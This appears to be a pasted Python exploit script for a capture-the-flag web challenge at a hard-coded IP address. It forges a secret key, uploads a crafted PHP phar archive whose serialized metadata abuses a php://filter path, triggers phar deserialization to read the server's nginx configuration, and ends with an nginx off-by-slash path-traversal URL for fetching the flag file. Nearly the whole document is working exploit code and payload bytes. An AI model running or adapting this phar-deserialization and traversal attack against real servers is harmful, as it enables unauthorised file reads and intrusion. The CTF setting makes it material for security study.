b1Uzfz2s

· 6 years ago · Aug 21, 2019, 04:04 AM
1import requests
2import re
3import urllib
4import base64
5
6def genkey(a):
7	ret = ""
8	imgsig = "GIF"
9	for i in xrange(len(imgsig)):
10		ret += chr(ord(a[i]) ^ ord(imgsig[i]))
11	return ret
12
13
14def xor(a,key):
15	ret = ""
16	for i in xrange(len(a)):
17		ret += chr(ord(a[i])^ord(key[i%len(key)]))
18	return ret
19
20secretkey = genkey("##\n")
21
22s = requests.Session()
23
24
25url = "http://192.241.144.92:80/oldchall/e9941d1621bdf00ef6a17c1e5176c1bcbb966b71/index.php?mytresure"
26
27# gen payloadphp from php
28"""
29<?php
30
31//Generate phar:
32
33$phar = new Phar('test.phar');
34$phar->startBuffering();
35$phar->addFromString('test.txt', 'text');
36$phar->setStub("--------------BEGIN--------------\n<?php __HALT_COMPILER(); ? >");
37
38// add object of any class as meta data
39class Map
40{
41	public $len_file_name_accept;
42    public $returnimage;
43    public $way;
44}
45$object = new Map;
46$object->way = 'php://filter/treasures/resource=/etc/nginx/sites-available/default';
47
48$phar->setMetadata($object);
49$phar->stopBuffering();
50
51?>
52"""
53
54payloadphp = "<?php __HALT_COMPILER(); ?>\r\n\xcb\x00\x00\x00\x01\x00\x00\x00\x11\x00\x00\x00\x01\x00\x00\x00\x00\x00\x95\x00\x00\x00O:3:\"Map\":3:{s:20:\"len_file_name_accept\";N;s:11:\"returnimage\";N;s:3:\"way\";s:66:\"php://filter/treasures/resource=/etc/nginx/sites-available/default\";}\x08\x00\x00\x00test.txt\x04\x00\x00\x00*\xb1[]\x04\x00\x00\x00\xc7\xa7\x8b;\xb6\x01\x00\x00\x00\x00\x00\x00text^\xdb\xca\x83\x1e\xfa\x0c\xa2\x88\xe2QE\x8dy\x07\xb9v\xb5O\x02\x00\x00\x00GBMB"
55burp0_data = {"secret": secretkey, "save": payloadphp}
56s.post(url, data=burp0_data)
57
58tmp = re.search("Your original treasure stored at (.*)\.txt",s.get(url).text)
59pharfile = tmp.group(1)
60url2 = "http://192.241.144.92/oldchall/e9941d1621bdf00ef6a17c1e5176c1bcbb966b71/index.php?secret="+urllib.quote(secretkey)+"&friendtresure=phar://"+pharfile
61
62tmp = re.search('\<img src\=\\\"data\:images\/png\;base64\,(.*)\\\" height',s.get(url2).text)
63
64enc = tmp.group(1)
65enc = base64.b64decode(enc)
66config = xor(enc,secretkey)
67
68print config
69
70
71"""
72--> flag at: /srv/flag_here_c91ab70e30e0aff0d97fa41a0cecf84c82e6ebb8c04c24fc3a6cb10059271b4c
73Find Nginx Off by Slash
74
75http://192.241.144.92/error.html../flag_here_c91ab70e30e0aff0d97fa41a0cecf84c82e6ebb8c04c24fc3a6cb10059271b4c
76"""